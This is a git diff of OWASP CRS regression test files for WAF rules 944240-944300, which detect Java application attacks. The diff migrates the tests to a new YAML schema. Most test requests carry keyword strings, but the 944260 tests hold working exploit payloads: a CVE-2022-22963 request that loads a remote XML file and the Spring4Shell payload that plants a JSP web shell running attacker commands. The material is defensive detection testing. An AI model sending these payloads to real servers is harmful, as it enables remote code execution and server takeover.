Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.whileclosure\"}" + output: + log: + expect_ids: [944240] + - test_id: 88 desc: "Content-Type application/json arg name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.whileclosure\": \"test\"}" - output: - log_contains: "id \"944240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.whileclosure\": \"test\"}" + output: + log: + expect_ids: [944240] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml index b8b744b..b9aa247 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml @@ -1,453 +1,451 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944250.yaml" - description: "Positive tests for rule 944250" +rule_id: 944250 tests: - - test_title: 944250-1 + - test_id: 1 desc: "Argument test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log: + expect_ids: [944250] + - test_id: 2 desc: "Argument name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime=test" - output: - log_contains: "id \"944250\"" - - test_title: 944250-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime=test" + output: + log: + expect_ids: [944250] + - test_id: 3 desc: "Cookie test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.evil.runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 4 desc: "Cookie name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.evil.runtime=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.runtime=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 5 desc: "Request header test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.evil.runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 6 desc: "XML attribute value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944250] + - test_id: 7 desc: "XML element value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log: + expect_ids: [944250] + - test_id: 8 desc: "Nested XML element value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log: + expect_ids: [944250] + - test_id: 9 desc: "Content-Type text/plain includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log: + expect_ids: [944250] + - test_id: 10 desc: "Content-Type application/json arg value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.evil.runtime\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.runtime\"}" + output: + log: + expect_ids: [944250] + - test_id: 11 desc: "Content-Type application/json arg name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.evil.runtime\": \"test\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.evil.runtime\": \"test\"}" + output: + log: + expect_ids: [944250] + - test_id: 12 desc: "Argument test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log: + expect_ids: [944250] + - test_id: 13 desc: "Argument name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder=test" - output: - log_contains: "id \"944250\"" - - test_title: 944250-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder=test" + output: + log: + expect_ids: [944250] + - test_id: 14 desc: "Cookie test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.evil.processbuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.processbuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 15 desc: "Cookie name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.evil.processbuilder=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.processbuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 16 desc: "Request header test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.evil.processbuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.processbuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944250] + - test_id: 17 desc: "XML attribute value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944250] + - test_id: 18 desc: "XML element value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log: + expect_ids: [944250] + - test_id: 19 desc: "Nested XML element value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log: + expect_ids: [944250] + - test_id: 20 desc: "Content-Type text/plain includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log: + expect_ids: [944250] + - test_id: 21 desc: "Content-Type application/json arg value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.evil.processbuilder\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.processbuilder\"}" + output: + log: + expect_ids: [944250] + - test_id: 22 desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.evil.processbuilder\": \"test\"}" - output: - log_contains: "id \"944250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.evil.processbuilder\": \"test\"}" + output: + log: + expect_ids: [944250] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml index 144d3f5..d6a8d28 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml @@ -1,41 +1,39 @@ --- meta: author: "theMiddle, azurit" - enabled: true - name: "944260.yaml" - description: "Positive tests for rule 944260" +rule_id: 944260 tests: - - test_title: 944260-1 + - test_id: 1 desc: "CVE-2022-22963" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.1" - data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')" - output: - log_contains: "id \"944260\"" - - test_title: 944260-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.1" + data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')" + output: + log: + expect_ids: [944260] + - test_id: 2 desc: "Spring Framework RCE" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.1" - data: "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" - output: - log_contains: "id \"944260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.1" + data: "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" + output: + log: + expect_ids: [944260] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml index 412a3b6..9ab732e 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml @@ -1,6697 +1,6605 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944300.yaml" - description: "Positive tests for rule 944300" +rule_id: 944300 tests: - - test_title: 944300-1 + - test_id: 1 desc: "Argument test includes keyword cnVudGltZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" 